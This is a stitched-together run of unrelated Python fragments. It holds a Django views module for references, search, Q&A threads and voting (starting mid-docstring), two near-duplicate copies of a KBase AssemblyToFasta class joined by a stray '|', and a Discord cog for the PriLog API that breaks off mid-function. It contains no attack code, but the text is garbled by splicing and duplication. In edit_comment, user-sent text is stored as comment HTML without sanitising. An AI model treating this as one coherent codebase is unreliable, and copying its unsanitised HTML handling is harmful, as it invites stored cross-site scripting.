    and lowercase/uppercase variants of 'doi' and 'url' are both accepted.

    TEST 1
    @article{Barrangou_2007,
    doi = {10.1126/science.1138140},
    url = {https://doi.org/10.1126%2Fscience.1138140},
    year = 2007,
    month = {mar},
    publisher = {American Association for the Advancement of Science ({AAAS})},
    volume = {315},
    number = {5819},
    pages = {1709--1712},
    author = {R. Barrangou and C. Fremaux and H. Deveau and M. Richards and P. Boyaval and S. Moineau and D. A. Romero and P. Horvath},
    title = {{CRISPR} Provides Acquired Resistance Against Viruses in Prokaryotes},
    journal = {Science}
    }
    '''
    name = next(iter(fields))  # first key
    entry = fields[name]

    # Remove '{' and '}' (bibtex uses them to protect capitalization)
    title = entry.get('title', '').replace('{', '').replace('}', '')

    # Accept both lowercase and uppercase field names
    doi = entry.get('doi', '') or entry.get('DOI', '')
    url = entry.get('url', '') or entry.get('URL', '')

    return {
        'references_name': name,
        'references_formatted': str_response,
        'references_title': title,
        'references_doi': doi,
        'references_url': url,
    }
@has_data
def references_generate(request, **kwargs):
    '''
    Generate an HTML-formatted reference from user-supplied BIBTEX.
    '''
    ok, str_response, fields = bibtex_to_html(kwargs['references_BIBTEX'])
    if not ok:
        return fail(str_response)

    return success(get_fields_from_bibtex_fields(fields, str_response))
@has_data
def references_process_doi(request, **kwargs):
    '''
    Generate a BIBTEX entry (and its HTML rendering) from a DOI.
    '''
    references_doi = kwargs.get('references_doi', '')
    if not references_doi:
        return fail('DOI is empty')

    # A DOI is valid if it forms a resolvable dx.doi.org URL
    if not valid_url("http://dx.doi.org/" + references_doi):
        return fail('Invalid DOI. Example of valid DOI: 10.1126/science.1138140')

    bibtex = resolve_doi(references_doi)
    if not bibtex:
        return fail('Could not get bibliographic information for this DOI')

    ok, str_response, fields = bibtex_to_html(bibtex)
    if not ok:
        # This should never happen..
        return fail('The BIBTEX returned from this doi was invalid: ' + str_response)

    ret = get_fields_from_bibtex_fields(fields, str_response)
    ret['references_BIBTEX'] = bibtex
    return success(ret)
@has_data
def references_add(request, **kwargs):
    '''
    Add a new reference.
    Requires a logged-in, email-validated user. Name, title and URL are
    mandatory; name (case-insensitive), URL and DOI must all be unique.
    If a BIBTEX entry is supplied it is rendered to HTML and its fields are
    stored as ReferenceField objects linked to the new Reference.
    '''
    # Check user
    if request.user.is_anonymous:
        return fail('Please login to create References')

    # Check if user is validated
    if not user_is_validated(request):
        return fail('Please validate your email to create new references ' + validate_toast_button());

    references_name = kwargs.get('references_name', '')
    if not references_name:
        return fail('References Name is required')
    if not re.match(r'\w+', references_name):
        return fail('Invalid Reference Name. It should contain only letters and numbers')

    references_title = kwargs.get('references_title', '')
    if not references_title:
        return fail('References Title is required')

    references_url = kwargs.get('references_url', '')
    if not references_url:
        return fail('References URL is required')

    # Is there a reference with the same url?
    url_ref = Reference.objects.filter(url=references_url)
    if url_ref.exists():
        return fail('A Reference with this URL already exists: {}'.format(url_ref.first().name))

    # References are case insensitive!
    references_name = references_name.lower()

    # Are there any references with this name?
    if Reference.objects.filter(name=references_name).exists():
        return fail('A Reference with this name already exists')

    # Is there a reference with the same DOI?
    references_doi = kwargs.get('references_doi', None)
    if references_doi:
        doi_ref = Reference.objects.filter(doi=references_doi)
        if doi_ref.exists():
            return fail('A Reference with this DOI already exists: {}'.format(doi_ref.first().name))

    # Check bibtex (optional)
    references_BIBTEX = kwargs.get('references_BIBTEX', '')
    reference_fields = []
    html = None
    if references_BIBTEX:
        suc, str_response, fields = bibtex_to_html(references_BIBTEX)
        if not suc:
            return fail(str_response)

        # It succeeded to parse BIBTEX. Get the html
        html = str_response
        name = list(fields.keys())[0] # first key

        # Create (or get) ReferenceFields from the parsed bibtex key/value pairs
        reference_fields = [ReferenceField.objects.get_or_create(
            key=reference_key,
            value=reference_value,
        )[0] for reference_key, reference_value in fields[name].items()]

    # Create Reference object
    reference = Reference(
        obc_user = OBC_user.objects.get(user=request.user),
        name = references_name,
        url = references_url,
        title = references_title,
        doi = references_doi,
        bibtex = references_BIBTEX if references_BIBTEX else None,
        html = html,
        notes = kwargs.get('references_notes', None),
    )
    reference.save()

    # Add fields from BIBTEX
    reference.fields.add(*reference_fields)
    reference.save()

    ret = {
        'references_formatted': html,
        'references_created_at': datetime_to_str(reference.created_at),
        'references_username': request.user.username,
    }
    return success(ret)
def references_search_2(main_search):
    '''
    Collect all references matching the main search.
    Matches against the reference name, its rendered html and the author's username.
    '''
    matches = Reference.objects.filter(
        Q(name__icontains=main_search) |
        Q(html__icontains=main_search) |
        Q(obc_user__user__username__icontains=main_search)
    )

    # One flat jstree node per matching reference
    jstree_nodes = []
    for reference in matches:
        jstree_nodes.append({
            'data': {'name': reference.name},
            'text': reference.name + jstree_icon_html('references'),
            'id': reference.name,
            'parent': '#',
            'state': { 'opened': True},
        })

    return {
        'main_search_references_number': matches.count(),
        'references_search_jstree': jstree_nodes,
    }
def qa_get_root_comment(comment):
    '''
    Walk up a nested comment thread and return the root (parent-less) comment.
    '''
    current = comment
    while current.parent:
        current = current.parent
    return current
def qa_search_2(main_search):
    '''
    Collect all Q&A threads from main search.
    Matches against title, comment body and author username; each matching
    thread appears once in the resulting jstree (indexed by its root comment).
    '''
    title_Q = Q(title__icontains=main_search)
    comment_Q = Q(comment__icontains=main_search)
    username_Q = Q(obc_user__user__username__icontains=main_search)
    results = Comment.objects.filter(title_Q | comment_Q | username_Q)

    qa_search_tree = []
    entries_in_tree = set()
    for result in results:
        # Threads are indexed by their root comment
        result_parent = qa_get_root_comment(result)

        # Is this already on the tree?
        if result_parent.pk in entries_in_tree:
            continue
        entries_in_tree.add(result_parent.pk)

        # Remove <a></a> hyperlinks from question titles (see issue #106).
        # Hoisted the regex so it is evaluated once per title instead of three times.
        anchor_match = re.search(r'<a.*a>', result_parent.title)
        if anchor_match:
            to_substitute = anchor_match.group(0)
            substitute_with = re.search(r'>(.*)</a>', to_substitute).group(1)
            result_parent.title = result_parent.title.replace(to_substitute, substitute_with)

        qa_search_tree.append({
            'data': {'id': result_parent.pk},
            'text': result_parent.title + jstree_icon_html('qas'),
            'id': str(result_parent.pk),
            'parent': '#',
            'state': { 'opened': True},
        })

    ret = {
        'main_search_qa_number': len(qa_search_tree),
        'qa_search_jstree': qa_search_tree,
    }
    return ret
@has_data
def references_search_3(request, **kwargs):
    '''
    Fetch the full details of a single Reference, looked up by name
    (case-insensitive).
    '''
    name = kwargs.get('name', '')
    try:
        reference = Reference.objects.get(name__iexact=name)
    except ObjectDoesNotExist:
        return fail('Could not find Reference')  # This should never happen..
    # Map response keys to the model attributes they expose
    field_map = {
        'references_name': 'name',
        'references_title': 'title',
        'references_url': 'url',
        'references_doi': 'doi',
        'references_notes': 'notes',
        'references_BIBTEX': 'bibtex',
        'references_html': 'html',
    }
    payload = {key: getattr(reference, attr) for key, attr in field_map.items()}
    payload['references_created_at'] = datetime_to_str(reference.created_at)
    payload['references_username'] = reference.obc_user.user.username
    return success(payload)
### END OF REFERENCES
### SEARCH
@has_data
def all_search_2(request, **kwargs):
    '''
    Called when there is a key change in main search.

    Splits the search term on '/' to decide which sub-searches apply:
      * no slash:    search tools and workflows by name only
      * one slash:   "name/version" for tools, "name/edit" for workflows
      * two slashes: "name/version/edit", tools only
      * more:        disable tool/workflow search entirely
    Reports, references, users and Q&A are always searched with the raw term.
    '''
    main_search = kwargs.get('main_search', '')
    main_search_slash_count = main_search.count('/')
    # Check for slashes
    # NOTE(review): the "do not apply search" sentinels are inconsistent in
    # type ('' vs 0 vs -1) -- presumably the downstream *_search_2 helpers
    # accept all of them; confirm before unifying.
    if main_search_slash_count == 0:
        tools_search_name = main_search
        tools_search_version = ''
        tools_search_edit = ''
        workflows_search_name = main_search
        workflows_search_edit = ''
    elif main_search_slash_count == 1:
        tools_search_name, tools_search_version = main_search.split('/')
        tools_search_name = tools_search_name.strip()
        tools_search_version = tools_search_version.strip()
        tools_search_edit = 0 # Do not apply search
        workflows_search_name, workflows_search_edit = main_search.split('/')
        workflows_search_name = workflows_search_name.strip()
        workflows_search_edit = workflows_search_edit.strip()
        try:
            workflows_search_edit = int(workflows_search_edit)
        except ValueError:
            workflows_search_edit = 0 # do not apply search on workflow edit
    elif main_search_slash_count == 2:
        # Practically apply only tool search
        tools_search_name, tools_search_version, tools_search_edit = main_search.split('/')
        tools_search_name = tools_search_name.strip()
        tools_search_version = tools_search_version.strip()
        try:
            tools_search_edit = int(tools_search_edit)
        except ValueError:
            tools_search_edit = 0 # Do not apply search no tool edit
        workflows_search_name = ''
        workflows_search_edit = -1
    else:
        # Three or more slashes: nothing tool/workflow-like can match
        tools_search_name = ''
        tools_search_version = ''
        tools_search_edit = -1
        workflows_search_name = ''
        workflows_search_edit = -1
    # Merge the partial result dicts of every sub-search into one response
    ret = {}
    #Get tools
    for key, value in tools_search_2(tools_search_name, tools_search_version, tools_search_edit).items():
        ret[key] = value
    #Get workflows
    for key, value in workflows_search_2(workflows_search_name, workflows_search_edit).items():
        ret[key] = value
    #Get reports
    for key, value in reports_search_2(main_search, request).items():
        ret[key] = value
    #Get references
    for key, value in references_search_2(main_search).items():
        ret[key] = value
    #Get users
    for key, value in users_search_2(main_search).items():
        ret[key] = value
    # Get QAs
    for key, value in qa_search_2(main_search).items():
        ret[key] = value
    return success(ret)
### END OF SEARCH
### Q&A
@has_data
def qa_add_1(request, **kwargs):
    '''
    Called from qa_add_1/

    Create a brand new (root) Q&A question from the submitted title and
    markdown comment.
    '''
    qa_title = kwargs.get('qa_title', '')
    if not qa_title:
        return fail('Title should not be empty')
    qa_comment = kwargs.get('qa_comment', '')
    if not qa_comment:
        return fail('Comment should not be empty')
    if request.user.is_anonymous:
        return fail('Please login to post a new question')
    # We cannot have the same comment title more than once
    if Comment.objects.filter(title__iexact=qa_title).exists():
        return fail('A comment with this title already exists!')
    qa_comment_html = markdown(qa_comment)
    # A root question is a Comment without a parent
    question = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=qa_comment,
        comment_html=qa_comment_html,
        title=qa_title,
        parent=None,
        upvotes=0,
        downvotes=0,
    )
    question.save()
    return success({
        'id': question.pk,
        'comment_html': qa_comment_html,
    })
def qa_create_thread(comment, obc_user=None):
    '''
    Recursively build the reply thread beneath *comment*.

    Returns a list of plain dicts, one per direct child, each carrying its
    own nested 'children' list.
    '''
    return [
        {
            'comment': reply.comment,
            'comment_html': reply.comment_html,
            'opinion': reply.opinion,
            'score': reply.upvotes - reply.downvotes,
            'id': reply.pk,
            'replying': False,
            'voted': is_comment_updownvoted(obc_user, reply),
            'children': qa_create_thread(reply, obc_user),
            'username': reply.obc_user.user.username,
            'created_at': datetime_to_str(reply.created_at),
        }
        for reply in comment.children.all()
    ]
@has_data
def qa_search_3(request, **kwargs):
    '''
    path: qa_search_3/
    From angular: Fetch the data from a single Q&A and update the UI
    Get a unique Q&A thread
    '''
    qa_pk = kwargs.get('qa_id', None)
    if not qa_pk:
        return fail('Could not find Q&A id')
    try:
        root = Comment.objects.get(pk=qa_pk)
    except ObjectDoesNotExist:
        return fail('Could not find comment database object')
    # Anonymous visitors have no vote state to look up
    obc_user = None if request.user.is_anonymous else OBC_user.objects.get(user=request.user)
    return success({
        'qa_title': root.title,
        'qa_comment': root.comment,
        'qa_comment_html': root.comment_html,
        'qa_score': root.upvotes - root.downvotes,
        'qa_id': root.pk,
        'qa_thread': qa_create_thread(root, obc_user),
        'qa_voted': is_comment_updownvoted(obc_user, root),
        'qa_username': root.obc_user.user.username,
        'qa_created_at': datetime_to_str(root.created_at),
    })
@has_data
def get_pk_from_root_comment(request, **kwargs):
    '''
    path: get_pk_from_root_comment/

    Map the id of a root Q&A comment back to the primary key of the Tool
    or Workflow it is attached to.
    '''
    comment_id = int(kwargs['comment_id'])
    pk_type = kwargs['type']
    # BUGFIX: filter().first() returns None when nothing matches -- it never
    # raises ObjectDoesNotExist -- so the old try/except was dead code and a
    # missing object crashed with AttributeError on '.id'. Check for None
    # explicitly instead.
    if pk_type == 'tool':
        obj = Tool.objects.filter(comment_id=comment_id).first()
    elif pk_type == 'workflow':
        obj = Workflow.objects.filter(comment_id=comment_id).first()
    else:
        return fail('ERROR: 2919 . Unknown pk_type: {}'.format(pk_type))
    if obj is None:
        return fail('Could not find tool or workflow database object')
    ret = {
        'pk': obj.id,
    }
    return success(ret)
@has_data
def gen_qa_search_3(request, **kwargs):
    '''
    PATH: gen_qa_search_3/
    Generic version of qa_search_3
    Get a unique Q&A thread
    '''
    object_pk = kwargs['object_pk']  # primary key of the tool/workflow
    qa_type = kwargs['qa_type']
    # Resolve the commentable research object
    if qa_type == 'tool':
        commentable = Tool.objects.get(pk=object_pk)
    elif qa_type == 'workflow':
        commentable = Workflow.objects.get(pk=object_pk)
    else:
        return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
    # Anonymous visitors have no vote state to look up
    obc_user = None if request.user.is_anonymous else OBC_user.objects.get(user=request.user)
    root = commentable.comment
    # Get the thread of this comment
    return success({
        'qa_id': root.pk,
        'qa_thread': qa_create_thread(root, obc_user),
        'qa_voted': is_comment_updownvoted(obc_user, root),
        'qa_score': root.upvotes - root.downvotes,
        'qa_username': root.obc_user.user.username,
        'qa_created_at': datetime_to_str(root.created_at),
    })
@has_data
def qa_add_comment(request, **kwargs):
    '''
    Add a comment (reply) to a Q&A question.
    '''
    if request.user.is_anonymous:
        return fail('Please login to add a new comment')
    if not user_is_validated(request):
        return fail('Please validate your email to add a new comment' + validate_toast_button())
    parent_pk = kwargs.get('qa_id', None)
    if parent_pk is None:
        return fail('Could not find Q&A id')
    comment_text = kwargs.get('qa_comment', None)
    if comment_text is None:
        return fail('Could not find Q&A new comment')
    if not comment_text.strip():
        return fail('Comment cannot be empty')
    comment_html = markdown(comment_text)
    opinion = kwargs.get('qa_opinion', None)
    if opinion not in ('solution', 'note', 'agree', 'disagree'):
        return fail('Error 9177. opinion value unknown')
    try:
        parent_comment = Comment.objects.get(pk=parent_pk)
    except ObjectDoesNotExist:
        return fail('ERROR: 8991. Could not find comment database object')
    reply = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=comment_text,
        comment_html=comment_html,
        opinion=opinion,
        parent=parent_comment,
        upvotes=0,
        downvotes=0,
    )
    reply.save()
    # Link the reply into the parent's thread
    parent_comment.children.add(reply)
    parent_comment.save()
    return success({'comment_html': comment_html})
@has_data
def gen_qa_add_comment(request, **kwargs):
    '''
    PATH: gen_qa_add_comment/
    Generic version of the qa_add_comment
    Add a comment at a Q&A question

    Attaches a new reply either to the root comment of a Tool/Workflow
    (comment_pk is None) or to an explicit parent comment.
    '''
    if request.user.is_anonymous:
        return fail('Please login to add a new comment')
    if not user_is_validated(request):
        return fail('Please validate your email to add a new comment ' + validate_toast_button())
    comment_pk = kwargs['comment_pk']
    object_pk = kwargs['object_pk']
    qa_comment = kwargs['qa_comment']
    qa_opinion = kwargs['qa_opinion']
    qa_type = kwargs['qa_type']
    # Validate input the same way the sibling qa_add_comment does -- the
    # original accepted empty comments and arbitrary opinion values.
    if not qa_comment or not qa_comment.strip():
        return fail('Comment cannot be empty')
    if qa_opinion not in ('solution', 'note', 'agree', 'disagree'):
        return fail('Error 9177. opinion value unknown')
    current_comment_html = markdown(qa_comment)
    # Get the tool or workflow this comment belongs to
    if qa_type == 'tool':
        commentable = Tool.objects.get(pk=object_pk)
    elif qa_type == 'workflow':
        commentable = Workflow.objects.get(pk=object_pk)
    else:
        return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
    # Get the parent: the RO's root comment unless an explicit one was given
    if comment_pk is None:
        root_comment = commentable.comment
    else:
        root_comment = Comment.objects.get(pk=comment_pk)
    new_comment = Comment(
        obc_user=OBC_user.objects.get(user=request.user),
        comment=qa_comment,
        opinion=qa_opinion,
        comment_html=current_comment_html,
        parent=root_comment,
        upvotes=0,
        downvotes=0,
    )
    new_comment.save()
    root_comment.children.add(new_comment)
    root_comment.save()
    ret = {
        'comment_html': current_comment_html,
    }
    return success(ret)
def is_comment_updownvoted(obc_user, comment):
    '''
    Return this user's vote state for *comment* as {'up': bool, 'down': bool}.

    Anonymous users (obc_user is None) and users without a recorded vote
    get both flags False.
    '''
    no_vote = {'up': False, 'down': False}
    if obc_user is None:
        return no_vote
    try:
        vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
    except ObjectDoesNotExist:
        return no_vote
    return {'up': vote.upvote, 'down': not vote.upvote}
@has_data
def updownvote_comment(request, **kwargs):
    '''
    url: updownvote_comment/

    Register an upvote or downvote on a Q&A comment.

    Rules (mirroring updownvote_tool_workflow):
      * voting the same direction twice fails,
      * voting the opposite direction removes the existing vote
        (net effect: back to neutral),
      * otherwise a new vote is recorded.
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote comments')
    if not user_is_validated(request):
        return fail('Please validate your email to upvote/downvote' + validate_toast_button())
    comment_id = int(kwargs['comment_id'])
    upvote = kwargs['upvote']
    assert upvote in [True, False]
    # Get the comment
    comment = Comment.objects.get(pk=comment_id)
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    # Check if there is already a vote from this user on this comment
    try:
        vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
    except ObjectDoesNotExist:
        # First vote: create the UpDownCommentVote object and count it
        vote = UpDownCommentVote(
            obc_user=obc_user,
            comment=comment,
            upvote=upvote,
        )
        vote.save()
        voted = {'up': upvote, 'down': not upvote}
        if upvote:
            comment.upvotes += 1
        else:
            comment.downvotes += 1
    else:
        # A vote for this comment already exists
        if vote.upvote and upvote:
            # You cannot upvote twice!
            return fail('Already upvoted')
        if (not vote.upvote) and (not upvote):
            # You cannot downvote twice!
            return fail('Already downvoted')
        # Opposite direction: remove the old vote and undo its counter.
        # BUGFIX: the old code incremented the *new* direction here instead
        # of decrementing the old one, so upvotes/downvotes both grew on
        # every toggle (the returned score was coincidentally the same, but
        # the stored counters drifted; updownvote_tool_workflow decrements
        # correctly).
        if vote.upvote:
            comment.upvotes -= 1
        else:
            comment.downvotes -= 1
        vote.delete()
        voted = {'up': False, 'down': False}  # Neither upvoted nor downvoted
    comment.save()
    ret = {
        'score': comment.upvotes - comment.downvotes,
        'voted': voted
    }
    return success(ret)
@has_data
def updownvote_tool_workflow(request, **kwargs):
    '''
    Called from $scope.updownvote_tool_workflow
    Called when a user hit the buttons for upvote or downvote or a tool or for a workflow

    kwargs:
        ro     : 'tool' or 'workflow'
        ro_obj : dict of lookup kwargs identifying the research object
        upvote : True for upvote, False for downvote
    Voting the same direction twice fails; voting the opposite direction
    deletes the existing vote (back to neutral).
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote Research Objects')
    if not user_is_validated(request):
        return fail('Please validate your email to upvote/downvote' + validate_toast_button());
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    ro = kwargs.get('ro', '')
    if not ro:
        return fail('Error 1023')
    if not ro in ['tool', 'workflow']:
        return fail('Error 1026')
    ro_obj = kwargs.get('ro_obj', '')
    if not ro_obj:
        return fail('Error 1024')
    upvote = kwargs.get('upvote', '')
    if upvote == '':
        return fail('Error 1025')
    if not upvote in [True, False]:
        return fail('Error 1027')
    # Get the tool/workflow database object
    # Map the 'ro' discriminator to the model table and its vote table
    ro_table = {
        'tool': Tool,
        'workflow': Workflow,
    }[ro]
    ro_ud_table = {
        'tool': UpDownToolVote,
        'workflow': UpDownWorkflowVote,
    }[ro]
    try:
        ro_table_obj = ro_table.objects.get(**ro_obj)
    except ObjectDoesNotExist as e:
        return fail('Error 1027')
    # Check if this user has already upvoted or downvoted this RO
    # (the vote table's FK field is named after 'ro', hence the dict lookup)
    try:
        ro_ud_table_obj = ro_ud_table.objects.get(**{
            'obc_user': obc_user,
            ro: ro_table_obj,
        })
    except ObjectDoesNotExist as e:
        # This user has **not** upvoted or downvoted this RO
        pass
    else:
        # This user has upvoted or downvoted this RO in the past
        if ro_ud_table_obj.upvote and upvote:
            return fail('You cannot upvote twice')
        elif (not ro_ud_table_obj.upvote) and (not upvote):
            return fail('You cannot downvote twice')
        elif ro_ud_table_obj.upvote and (not upvote):
            # Upvote followed by downvote: remove the vote and undo the
            # previous upvote, leaving the RO in the neutral state.
            # Delete upvote vote!
            ro_ud_table_obj.delete()
            # Update votes
            ro_table_obj.upvotes -= 1
            ro_table_obj.save()
            return success({
                'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
                'voted': {'up': False, 'down': False},
            })
        elif (not ro_ud_table_obj.upvote) and upvote:
            # Downvote followed by upvote: symmetric to the branch above.
            # Delete downvote vote
            ro_ud_table_obj.delete()
            ro_table_obj.downvotes -= 1
            ro_table_obj.save()
            return success({
                'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
                'voted': {'up': False, 'down': False},
            })
    #This user has not upvoted or downvoted before this RO
    #Create a new vote database object
    new_vote_obj = ro_ud_table(**{
        'obc_user': obc_user,
        ro: ro_table_obj,
        'upvote': upvote,
    })
    new_vote_obj.save()
    # Change the upvote / downvote counter of this research object
    if upvote:
        ro_table_obj.upvotes += 1
    else:
        ro_table_obj.downvotes += 1
    ro_table_obj.save()
    ret = {
        'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
        'voted': {'up': upvote, 'down': not upvote},
    }
    return success(ret)
@has_data
def markdown_preview(request, **kwargs):
    '''
    Render the submitted markdown text to HTML for a live preview.
    '''
    text = kwargs.get('text', '')
    # Exact type check kept on purpose (str subclasses are also rejected,
    # matching the previous behavior)
    if type(text) is not str:
        return fail('Error 2871')
    return success({'html': markdown(text)})
@has_data
def edit_comment(request, **kwargs):
    '''
    url: edit_comment/

    Edit an existing Q&A comment (reply) or, for a root comment, its title.
    Only the author of the comment may edit it.
    '''
    if request.user.is_anonymous:
        return fail('Please login to upvote/downvote comments')
    if not user_is_validated(request):
        return fail('Please validate your email to edit the comment.' + validate_toast_button());
    comment_id = int(kwargs['comment_id'])
    new_html = kwargs['new_html']
    is_root = kwargs['is_root']
    comment_type = kwargs.get('comment_type')
    # Get the comment
    comment = Comment.objects.get(pk=comment_id)
    # Get the user
    obc_user = OBC_user.objects.get(user=request.user)
    # Only the original author may edit
    if comment.obc_user.id != obc_user.id:
        return fail("You don't have the permission to edit this comment!")
    if not is_root:
        # NOTE(review): elsewhere (qa_add_comment) .comment holds the raw
        # markdown source and .comment_html the rendered HTML; here the
        # assignments look swapped ('new_html' is rendered and stored in
        # .comment). Presumably the client actually sends markdown source
        # in 'new_html' -- confirm against the frontend before changing.
        comment.comment = markdown(new_html)
        comment.comment_html = new_html
        # Optionally update the reply's opinion label if a valid one is given
        if comment_type in ['solution', 'note', 'agree', 'disagree']:
            comment.opinion = comment_type
    else:
        # Root comments: only the title is editable here
        comment.title = new_html
    comment.save()
    ret = {
        'message': 'The comment has been updated!'
    }
    return success(ret)
### END OF Q&A
### VIEWS END ###### |
import os
import shutil
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import SingleLetterAlphabet
from installed_clients.DataFileUtilClient import DataFileUtil
class AssemblyToFasta:
    """Convert KBase Assembly / legacy ContigSet objects to FASTA files."""

    def __init__(self, callback_url, scratch):
        # scratch: writable working directory for all generated files
        self.scratch = scratch
        self.dfu = DataFileUtil(callback_url)

    def export_as_fasta(self, ctx, params):
        """ Used almost exclusively for download only """
        # validate parameters
        if 'input_ref' not in params:
            raise ValueError('Cannot export Assembly- not input_ref field defined.')
        # export to a file
        file = self.assembly_as_fasta(ctx, {'ref': params['input_ref']})
        # create the output directory and move the file there
        export_package_dir = os.path.join(self.scratch, file['assembly_name'])
        os.makedirs(export_package_dir)
        shutil.move(file['path'], os.path.join(export_package_dir, os.path.basename(file['path'])))
        # package it up and be done
        package_details = self.dfu.package_for_download({'file_path': export_package_dir,
                                                         'ws_refs': [params['input_ref']]
                                                         })
        return {'shock_id': package_details['shock_id']}

    def assembly_as_fasta(self, ctx, params):
        """ main function that accepts a ref to an object and writes a file """
        self.validate_params(params)
        # BUGFIX: the original f-string nested single quotes inside single
        # quotes (f'...{ params['ref']}'), which is a SyntaxError before
        # Python 3.12; use double quotes for the key for portability.
        print(f'downloading ws object data ({ params["ref"]})')
        assembly_object = self.dfu.get_objects({'object_refs': [params['ref']]})['data'][0]
        ws_type = assembly_object['info'][2]
        obj_name = assembly_object['info'][1]
        if 'filename' in params:
            output_filename = params['filename']
        else:
            output_filename = obj_name + '.fa'
        output_fasta_file_path = os.path.join(self.scratch, output_filename)
        # Dispatch on the workspace type of the fetched object
        if 'KBaseGenomes.ContigSet' in ws_type:
            self.process_legacy_contigset(output_fasta_file_path,
                                          assembly_object['data'])
        elif 'KBaseGenomeAnnotations.Assembly' in ws_type:
            self.process_assembly(output_fasta_file_path, assembly_object['data'])
        else:
            raise ValueError('Cannot write data to fasta; invalid WS type (' + ws_type +
                             '). Supported types are KBaseGenomes.ContigSet and ' +
                             'KBaseGenomeAnnotations.Assembly')
        return {'path': output_fasta_file_path, 'assembly_name': obj_name}

    def fasta_rows_generator_from_contigset(self, contig_list):
        """ generates SeqRecords iterator for writing from a legacy contigset object """
        for contig in contig_list:
            description = ''
            if 'description' in contig and contig['description']:
                description = contig['description']
            # NOTE(review): SingleLetterAlphabet is passed as the class, not
            # an instance, and Bio.Alphabet was removed in Biopython 1.78 --
            # presumably this targets an older Biopython; confirm.
            yield SeqRecord(Seq(contig['sequence'], SingleLetterAlphabet),
                            id=contig['id'],
                            description=description)

    def process_legacy_contigset(self, output_fasta_path, data):
        # SeqIO consumes the generator lazily, so contigs stream to disk
        SeqIO.write(self.fasta_rows_generator_from_contigset(data['contigs']),
                    output_fasta_path,
                    "fasta")

    def process_assembly(self, output_fasta_path, data):
        # The assembly's FASTA already lives in Shock; download and unpack it
        self.dfu.shock_to_file({'handle_id': data['fasta_handle_ref'],
                                'file_path': output_fasta_path,
                                'unpack': 'uncompress'
                                })

    def validate_params(self, params):
        # Raise ValueError for any required key missing from params
        for key in ['ref']:
            if key not in params:
                raise ValueError('required "' + key + '" field was not defined')
| import os
import shutil
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import SingleLetterAlphabet
from installed_clients.DataFileUtilClient import DataFileUtil
class AssemblyToFasta:
    """Turns KBase Assembly / legacy ContigSet objects into FASTA files."""

    def __init__(self, callback_url, scratch):
        # Working directory for every file this utility writes
        self.scratch = scratch
        self.dfu = DataFileUtil(callback_url)

    def export_as_fasta(self, ctx, params):
        """ Used almost exclusively for download only """
        if 'input_ref' not in params:
            raise ValueError('Cannot export Assembly- not input_ref field defined.')
        # Write the FASTA file, then stage it in its own package directory
        fasta_info = self.assembly_as_fasta(ctx, {'ref': params['input_ref']})
        package_dir = os.path.join(self.scratch, fasta_info['assembly_name'])
        os.makedirs(package_dir)
        destination = os.path.join(package_dir, os.path.basename(fasta_info['path']))
        shutil.move(fasta_info['path'], destination)
        # Hand the directory to DataFileUtil for packaging/upload
        package_details = self.dfu.package_for_download(
            {'file_path': package_dir, 'ws_refs': [params['input_ref']]})
        return {'shock_id': package_details['shock_id']}

    def assembly_as_fasta(self, ctx, params):
        """ main function that accepts a ref to an object and writes a file """
        self.validate_params(params)
        print(f'downloading ws object data ({ params["ref"]})')
        fetched = self.dfu.get_objects({'object_refs': [params['ref']]})['data'][0]
        ws_type = fetched['info'][2]
        obj_name = fetched['info'][1]
        output_filename = params['filename'] if 'filename' in params else obj_name + '.fa'
        out_path = os.path.join(self.scratch, output_filename)
        # Dispatch on the workspace type of the fetched object
        if 'KBaseGenomes.ContigSet' in ws_type:
            self.process_legacy_contigset(out_path, fetched['data'])
        elif 'KBaseGenomeAnnotations.Assembly' in ws_type:
            self.process_assembly(out_path, fetched['data'])
        else:
            raise ValueError('Cannot write data to fasta; invalid WS type (' + ws_type +
                             '). Supported types are KBaseGenomes.ContigSet and ' +
                             'KBaseGenomeAnnotations.Assembly')
        return {'path': out_path, 'assembly_name': obj_name}

    def fasta_rows_generator_from_contigset(self, contig_list):
        """ generates SeqRecords iterator for writing from a legacy contigset object """
        for entry in contig_list:
            note = entry['description'] if 'description' in entry and entry['description'] else ''
            yield SeqRecord(Seq(entry['sequence'], SingleLetterAlphabet),
                            id=entry['id'],
                            description=note)

    def process_legacy_contigset(self, output_fasta_path, data):
        # SeqIO consumes the generator lazily, so contigs stream to disk
        SeqIO.write(self.fasta_rows_generator_from_contigset(data['contigs']),
                    output_fasta_path, "fasta")

    def process_assembly(self, output_fasta_path, data):
        # The assembly's FASTA already lives in Shock; download and unpack it
        self.dfu.shock_to_file({'handle_id': data['fasta_handle_ref'],
                                'file_path': output_fasta_path,
                                'unpack': 'uncompress'})

    def validate_params(self, params):
        # Raise ValueError for any required key missing from params
        for key in ['ref']:
            if key not in params:
                raise ValueError('required "' + key + '" field was not defined')
import logging
import os
import aiohttp
import discord
from discord.ext import commands
PRILOG_TOKEN = os.environ["PRILOG_TOKEN"]
class PriLog(commands.Cog):
    """Prilog APIを利用します。"""
    # Discord cog wrapping the PriLog clan-battle video analysis API.
    # The command docstrings below are user-facing help text shown by
    # discord.py's help command, hence kept in Japanese.

    def __init__(self, bot):
        self.bot = bot
        self.logger = logging.getLogger('discord.PriLog')

    async def get_prilog(self, url):
        # Query the PriLog REST endpoint and return the decoded JSON payload
        async with aiohttp.ClientSession() as session:
            async with session.get('https://prilog.jp/rest/analyze'
                                   f'?Url={url}&Token={PRILOG_TOKEN}') as r:
                return await r.json()

    @commands.command()
    async def log(self, ctx, url: str):
        """
        引数にクランバトル動画を渡すとPriLogを利用できます。
        コマンドとURLの間に半角スペースを空けてください。
        例: /log https://www.youtube.com/watch?v=mvLSw5vCpGU
        """
        resp = await self.get_prilog(url)
